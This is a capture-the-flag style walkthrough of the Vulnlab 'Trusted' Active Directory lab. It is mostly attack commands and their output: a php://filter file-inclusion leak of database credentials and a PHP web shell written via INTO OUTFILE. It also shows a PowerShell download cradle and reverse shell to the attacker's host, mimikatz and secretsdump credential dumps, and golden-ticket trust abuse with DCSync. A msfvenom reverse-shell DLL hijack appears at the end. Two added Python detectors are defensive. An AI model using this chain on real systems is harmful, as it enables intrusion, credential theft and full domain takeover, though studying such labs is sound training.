Vulnlab trusted
nmap
enum
gobuster dir -x php -w /usr/share/wordlists/dirb/big.txt -u http://10.10.146.246/dev/

The view parameter of /dev/index.html includes the file it is given. With the php://filter wrapper the source of db.php comes back base64-encoded instead of being executed, which leaks the MySQL root credentials:

http://lab.trusted.vl/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php

echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d

<?php
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
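The filter-wrapper read above leaves a clear trace in the web server's access log: the wrapper scheme sits in plain sight in the query string. As an added example (not part of the original write-up), the Python below scans constructed Apache-style log lines for the indicators of this kind of include abuse in any query parameter: PHP stream wrappers, ../ traversal and absolute paths. The log lines and the indicator list are mine, not the lab's.

```python
"""Flag web requests whose query string carries a PHP stream wrapper or
path-traversal payload, as in the ?view= include above.
Added example: the log lines below are constructed, not taken from the lab."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format).
SAMPLE_LOG_LINES = [
    '10.8.2.138 - - [26/Jun/2024:08:01:10 +0000] "GET /dev/index.html?view=about.php HTTP/1.1" 200 512',
    r'10.8.2.138 - - [26/Jun/2024:08:01:12 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php HTTP/1.1" 200 433',
    '10.8.2.138 - - [26/Jun/2024:08:01:15 +0000] "GET /dev/index.html?view=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 92',
    '10.8.2.138 - - [26/Jun/2024:08:01:20 +0000] "GET /dev/back.php?c=whoami HTTP/1.1" 200 40',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Stream wrappers that should never show up in a user-controlled include path.
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|glob|file|ftp|https?):', re.I)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')
ABSOLUTE_RE = re.compile(r'^([a-zA-Z]:[\\/]|/)')


def classify_value(value):
    """Return the first matching indicator for an already URL-decoded
    query value, or None when it looks like a plain relative name."""
    if WRAPPER_RE.search(value):
        return "stream-wrapper"
    if TRAVERSAL_RE.search(value):
        return "path-traversal"
    if ABSOLUTE_RE.search(value):
        return "absolute-path"
    return None


def scan_access_log(lines):
    """Return (line_no, param, indicator, decoded_value) for every suspicious
    query parameter in the given log lines.  parse_qsl does the percent-decoding."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            indicator = classify_value(value)
            if indicator:
                findings.append((n, param, indicator, value))
    return findings


if __name__ == "__main__":
    for line_no, param, indicator, value in scan_access_log(SAMPLE_LOG_LINES):
        print(f"line {line_no}: {indicator} in {param}={value}")
```

On the sample lines this reports the php://filter read (line 2) and the traversal attempt (line 3) and stays quiet on the ordinary about.php request. The same classifier is the allowlist check the application itself should have applied to the view parameter before including anything.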
Upload a PHP shell (crackstation can crack Robert's hash)
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ mysql -u root -h lab.trusted.vl -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 8
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use news
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.022 sec)

MariaDB [news]> select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php';
Query OK, 1 row affected (0.023 sec)

MariaDB [news]> exit
Trigger the shell:
http://lab.trusted.vl/dev/back.php?c=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/puckshell.txt');/

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.146.246 - - [26/Jun/2024 08:13:02] "GET /puckshell.txt HTTP/1.1" 200 -

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.146.246] 64409
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\dev>whoami
nt authority\system
Get some more hashes
C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

c:\temp>curl http://10.8.2.138/mimikatz.exe -o mimi.exe

C:\temp>mimi

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1685702 (00000000:0019b8c6)
Session           : Batch from 0
User Name         : cpowers
Domain            : LAB
Logon Server      : LABDC
Logon Time        : 6/26/2024 6:30:01 AM
SID               : S-1-5-21-2241985869-2159962460-1278545866-1107
        msv :
         [00000003] Primary
         * Username : cpowers
         * Domain   : LAB
         * NTLM     : 322db798a55f85f09b3d61b976a13c43
         * SHA1     : e845d39122d58246ff7e28a282e8ed0e19ede373
         * DPAPI    : 01644e36ac919f8de1101ff9fde5a7fb
        tspkg :
        wdigest :
         * Username : cpowers
         * Domain   : LAB
         * Password : (null)
        kerberos :
         * Username : cpowers
         * Domain   : LAB.TRUSTED.VL
         * Password : (null)
        ssp :
        credman :
        cloudap :

mimikatz # exit
Bye!
Add a domain user
C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

C:\temp>net user puck Passw0rd123! /add /domain
The command completed successfully.

C:\temp>net localgroup Administrators puck /add /domain
The command completed successfully.

C:\temp>
We can now also RDP to lab.trusted.vl:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ xfreerdp /v:10.10.250.102 /u:puck
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - CN = labdc.lab.trusted.vl
Password:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-secretsdump 'puck@lab.trusted.vl'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x68580865f85a4743db214876adf784df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
puck:2102:aad3b435b51404eeaad3b435b51404ee:ab4f5a5c42df5a0ee337d12ce77332f5:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:61f6701481ff18844346b2f8ca47119a:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:88b2e30fba183f0fcdaba561a6ae64f5:::
[*] Kerberos keys grabbed
Then evil-winrm into lab.trusted.vl:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u puck -p Passw0rd123! -i lab.trusted.vl

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\puck\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> whoami
lab\puck
*Evil-WinRM* PS C:\temp> . ./PowerView.ps1
At C:\temp\PowerView.ps1:

Forest                  : trusted.vl
DomainControllers       : {labdc.lab.trusted.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : trusted.vl
PdcRoleOwner            : labdc.lab.trusted.vl
RidRoleOwner            : labdc.lab.trusted.vl
InfrastructureRoleOwner : labdc.lab.trusted.vl
Name                    : lab.trusted.vl

Forest                  : trusted.vl
DomainControllers       :
Children                :
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            :
RidRoleOwner            :
InfrastructureRoleOwner :
Name                    : trusted.vl

*Evil-WinRM* PS C:\temp> Get-DomainTrust

SourceName      : lab.trusted.vl
TargetName      : trusted.vl
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 9/14/2022 6:42:24 PM
WhenChanged     : 6/26/2024 6:21:06 AM
Trust Abuse
Following the article, we can abuse the child->parent domain trust relationship and escalate from lab.trusted.vl to the parent (enterprise) domain trusted.vl.

We need the krbtgt hash of lab.trusted.vl (already in the secretsdump output above, or via dcsync) and the SIDs of both domains. With mimikatz we then forge a golden ticket that carries the Enterprise Admins group (RID 519) of trusted.vl as an extra SID:
lsadump::dcsync /domain:lab.trusted.vl /all
Get the domain SIDs of lab.trusted.vl and trusted.vl by running:
*Evil-WinRM* PS C:\temp> ./mimi.exe "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)

Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)
 [  In ] LAB.TRUSTED.VL -> TRUSTED.VL
    * 6/26/2024 9:25:12 AM - CLEAR   - bd e0 30 b1 e3 5a 6f 28 d7 db 2d 12 f0 19 86 28 ee be df fa 8f 77 b0 7c 8a 82 05 e0 3f c0 85 81 2d 3a 45 eb 64 22 c6 e5 a3 e0 04 3f f8 fd 6d 59 d5 67 36 5d 32 f5 f2 01 3d 4a e9 29 91 c7 30 fa a4 a5 52 22 e6 17 09 c7 86 36 d7 ae 92 38 d2 7f 7a ec 7c 92 97 b6 e7 8f d3 59 74 97 31 70 8a 7d 88 11 29 e4 5c 0e ab b8 41 2a 35 39 68 f4 af 7b 01 bb 5c 6b a6 1d a6 2a d9 dc da 70 62 7e 75 c2 c4 95 9c 61 7c 98 b7 39 76 64 d6 d4 a3 9f fb f0 3c d7 76 d5 26 95 1b 96 e8 3f c2 a7 f2 99 9e 0a e9 b4 30 bf a9 6b 3a e1 ed 1e 33 17 70 43 41 d2 14 11 39 c8 d2 d5 41 54 24 f9 85 db 69 22 70 85 62 47 06 e3 2c 0a e1 bb 6e 8a 41 e8 09 1e e8 27 59 9e e7 14 d3 aa 3f 05 c3 6e 89 12 e7 cc 11 af 1a d9 a5 36 f8 2f e5 bb d5 d9 17 29 7d 11 d5 d5
        * aes256_hmac       87a58ba0eaa56e07d5eaadca5d5d043c64ef85efe9420279a98919d6d7b919f8
        * aes128_hmac       afe52545c051a7f537ea55d5abc96d31
        * rc4_hmac_nt       f3a4b4a5c1302b7da515ce596ad3281d

 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 31 dd 12 7a 9e f6 47 94 cd 56 25 1b 58 e6 e3 53 f6 77 19 eb ac bf 4f 28 1a 2d 1e 60 3b 16 6a 94 f7 25 a3 2e 40 13 fb 3d bf a4 42 a2 b1 42 bd 64 89 d6 8a 72 91 a7 da 2d ba 83 1e 6c 25 af ef ec 8c 98 3a 67 ad 67 a1 d8 d9 55 f4 dd 23 bc 93 01 16 10 7e ef 64 84 a3 be 02 25 c8 a6 45 93 b4 e8 5c 27 ee 44 06 a7 81 a0 c2 8e 3c 99 32 2b 4e 5a 19 58 55 8c bb b3 c3 24 55 9f 49 da ba 08 65 1c 3d 3c 59 36 cf 0c fe 15 3c 56 60 c8 1b e1 dd 33 54 c4 dd e3 2a a5 20 bf 9d fe dc ff 9e 61 7b 15 08 d3 22 6b a1 71 2d 48 5e 40 3f 66 fb d2 c6 cc 0c d5 af f1 0d 65 3d 72 45 2a c2 2e d7 86 e3 e0 4f 59 c2 61 fc d2 de d1 87 66 4f f8 f6 ee a4 ed e5 3e df bc b5 86 3a 13 ba ee 39 cb 28 84 58 7d 8d 65 43 28 9b f2 b4 d0 69 99 d2 c1 37 d5 d6 45
        * aes256_hmac       3e09cb23acb863c8d23bf8d07eace010cb980d5cfbda991345e4a7cec5352ad7
        * aes128_hmac       01b6b1243a4a9b0ed26869f79ef1ae75
        * rc4_hmac_nt       4eba988516b0b0fcf99c8f1b10e552de

 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL
    * 5/27/2023 4:19:25 PM - CLEAR   - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92
        * aes256_hmac       a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800
        * aes128_hmac       9d59311c51bd3eb6cc846cf1af53c80f
        * rc4_hmac_nt       fdb9239325aed982da5f521116ffbcaf

 [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74
        * aes256_hmac       bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183
        * aes128_hmac       0fe86c75c4b6686fcae0bd01d0a1fa2c
        * rc4_hmac_nt       cddbd971c2e3e4ef64b4eb024e4e75c0

mimikatz(commandline) # exit
Bye!
Next, forge a ticket for the enterprise domain admin:
kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt
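What makes this ticket work is that the /sids value (trusted.vl's domain SID with RID 519, Enterprise Admins) is honoured by the parent domain although it was asserted by the child domain's KDC: SID filtering is not applied on parent/child trusts inside one forest, which is why the forest, not the domain, is the security boundary. As an added example (not from the write-up), the Python below models that decision for the ExtraSids of a cross-domain ticket, using the two domain SIDs printed by lsadump::trust above. The ticket contents and the rule set are a simplification I constructed for illustration, not a parser for real PAC data.

```python
"""Model SID filtering on the ExtraSids (SID history) of a cross-domain
Kerberos ticket, and the alert a defender wants regardless of filtering.
Added example: the rule set is a simplification of Windows behaviour;
the domain SIDs are the ones printed by "lsadump::trust /patch" above."""
import re

DOMAIN_SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

# Domain SIDs from the lsadump::trust output above.
LAB_SID = "S-1-5-21-2241985869-2159962460-1278545866"      # child:  lab.trusted.vl
TRUSTED_SID = "S-1-5-21-3576695518-347000760-3731839591"   # parent: trusted.vl

# Well-known RIDs whose presence in SID history always deserves a look.
PRIVILEGED_RIDS = {
    512: "Domain Admins",
    516: "Domain Controllers",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID, or (None, None) for
    anything else (built-in SIDs such as S-1-5-32-544 do not match)."""
    m = DOMAIN_SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else (None, None)


def evaluate_extra_sids(issuing_domain_sid, trusting_domain_sid, extra_sids, quarantine=False):
    """Decide what the trusting domain does with the ExtraSids of a ticket
    signed by the issuing domain's KDC.

    quarantine=False models the default for a parent/child trust within a
    forest: nothing is filtered, the ticket is honoured as-is.
    quarantine=True models SID filtering as applied on forest trusts (or a
    trust quarantined explicitly): every SID whose domain part is not the
    issuing domain is dropped before the token is built.

    Independently of filtering, an ExtraSid that belongs to the trusting
    domain itself, or that carries a privileged well-known RID, is reported:
    outside a documented account migration nothing should produce that.
    """
    result = {"accepted": [], "filtered": [], "alerts": []}
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        foreign = domain != issuing_domain_sid
        if foreign and domain == trusting_domain_sid:
            who = PRIVILEGED_RIDS.get(rid, f"RID {rid}")
            result["alerts"].append(
                f"{sid} ({who}) belongs to the trusting domain but was asserted by {issuing_domain_sid}")
        elif rid in PRIVILEGED_RIDS:
            result["alerts"].append(f"{sid} ({PRIVILEGED_RIDS[rid]}) carried in SID history")
        if quarantine and foreign:
            result["filtered"].append(sid)
        else:
            result["accepted"].append(sid)
    return result


if __name__ == "__main__":
    # The ticket forged above: issued by lab.trusted.vl, carrying trusted.vl's Enterprise Admins SID.
    forged = [TRUSTED_SID + "-519"]
    for quarantine in (False, True):
        print(f"quarantine={quarantine}:", evaluate_extra_sids(LAB_SID, TRUSTED_SID, forged, quarantine))
```

With quarantine=False (the within-forest default) the Enterprise Admins SID is accepted and only the alert distinguishes the forged ticket from a legitimate one; with quarantine=True it is filtered before a token is built. A SID from the issuing domain's own range passes both checks silently, which is the behaviour a real SID-history migration relies on.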
All that is left is to dump NTDS from the trusted.vl domain:
lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all
We find:
Credentials:

Object RDN           : Domain Controllers

** SAM ACCOUNT **

SAM Username         : Domain Controllers
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-516
Object Relative ID   : 516

Credentials:

Object RDN           : DomainDnsZones

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db<REDACTED>72ef

Object RDN           : BCKUPKEY_0c265ae3-ef84-4900-9983-b1fbe71e738c Secret
And we evil-winrm into the main DC:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u Administrator -H '15db<REDACTED>72ef' -i trusted.vl

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
trusted\administrator
Recommended path
Use dnschef with bloodhound-python:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ dnschef --fakeip 10.10.158.230
          _                _          __
          | | version 0.4  | |        / _|
      __| |_ __  ___  ___| |__   ___| |_
     / _` | '_ \/ __|/ __| '_ \ / _ \  _|
    | (_| | | | \__ \ (__| | | |  __/ |
     \__,_|_| |_|___/\___|_| |_|\___|_|
                   iphelix@thesprawl.org

(18:52:27) [*] DNSChef started on interface: 127.0.0.1
(18:52:27) [*] Using the following nameservers: 8.8.8.8
(18:52:27) [*] Cooking all A replies to point to 10.10.158.230
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL
(18:52:53) [*] 127.0.0.1: proxying the response of type 'SRV' for _ldap._tcp.pdc._msdcs.LAB.TRUSTED.VL.home
(18:52:54) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
(18:52:55) [*] 127.0.0.1: cooking the response of type 'A' for labdc.LAB.TRUSTED.VL to 10.10.158.230
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ bloodhound-python -d 'LAB.TRUSTED.VL' -u 'rsmith' -p 'IHateEric2' -ns 127.0.0.1 -dc labdc.LAB.TRUSTED.VL -c all --zip
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: labdc.LAB.TRUSTED.VL
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 7 users
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 47 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: labdc.lab.trusted.vl
INFO: Done in 00M 05S
INFO: Compressing output into 20240624185341_bloodhound.zip
BloodHound analysis shows that rsmith can set the password of ewalters:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ rpcclient -U "rsmith" //10.10.192.230
Password for [WORKGROUP\rsmith]:IHateEric2
rpcclient $> setuserinfo2 ewalters 23 'Passw0rd123!'
rpcclient $>
We can verify that the password was actually updated and that we can log in through WinRM:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ crackmapexec winrm 10.10.192.230 -u ewalters -p 'Puckiestyle@20242024'
SMB         10.10.192.230   5985   LABDC            [*] Windows Server 2022 Build 20348 (name:LABDC) (domain:lab.trusted.vl)
HTTP        10.10.192.230   5985   LABDC            [*] http://10.10.192.230:5985/wsman
WINRM       10.10.192.230   5985   LABDC            [+] lab.trusted.vl\ewalters:Passw0rd123! (Pwn3d!)
and evil-winrm into labdc:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u ewalters -p Passw0rd123! -i 10.10.192.230

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ewalters\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\ewalters\Documents> hostname
labdc
*Evil-WinRM* PS C:\Users\ewalters\Documents>
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.192.230,59756)
[*] AUTHENTICATE_MESSAGE (\,LABDC)
[*] User LABDC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
*Evil-WinRM* PS C:\AVTest> dir

    Directory: C:\AVTest

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----          9/14/2022   7:05 PM            235 readme.txt

*Evil-WinRM* PS C:\AVTest> net use \\10.8.2.138\share
The command completed successfully.

*Evil-WinRM* PS C:\AVTest> copy .\KasperskyRemovalTool.exe \\10.8.2.138\share\KasperskyRemovalTool.exe
*Evil-WinRM* PS C:\AVTest>
After examining KasperskyRemovalTool.exe with procmon on my Windows box:
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.8.2.138 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
*Evil-WinRM* PS C:\AVTest> curl http://10.8.2.138/KasperskyRemovalToolENU.dll -o KasperskyRemovalToolENU.dll
*Evil-WinRM* PS C:\AVTest> dir

    Directory: C:\AVTest

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          9/14/2022   4:46 PM        4870584 KasperskyRemovalTool.exe
-a----          6/27/2024   8:19 AM           9216 KasperskyRemovalToolENU.dll
-a----          9/14/2022   7:05 PM            235 readme.txt

*Evil-WinRM* PS C:\AVTest>
After a couple of seconds we receive a shell as cpowers (a domain admin):
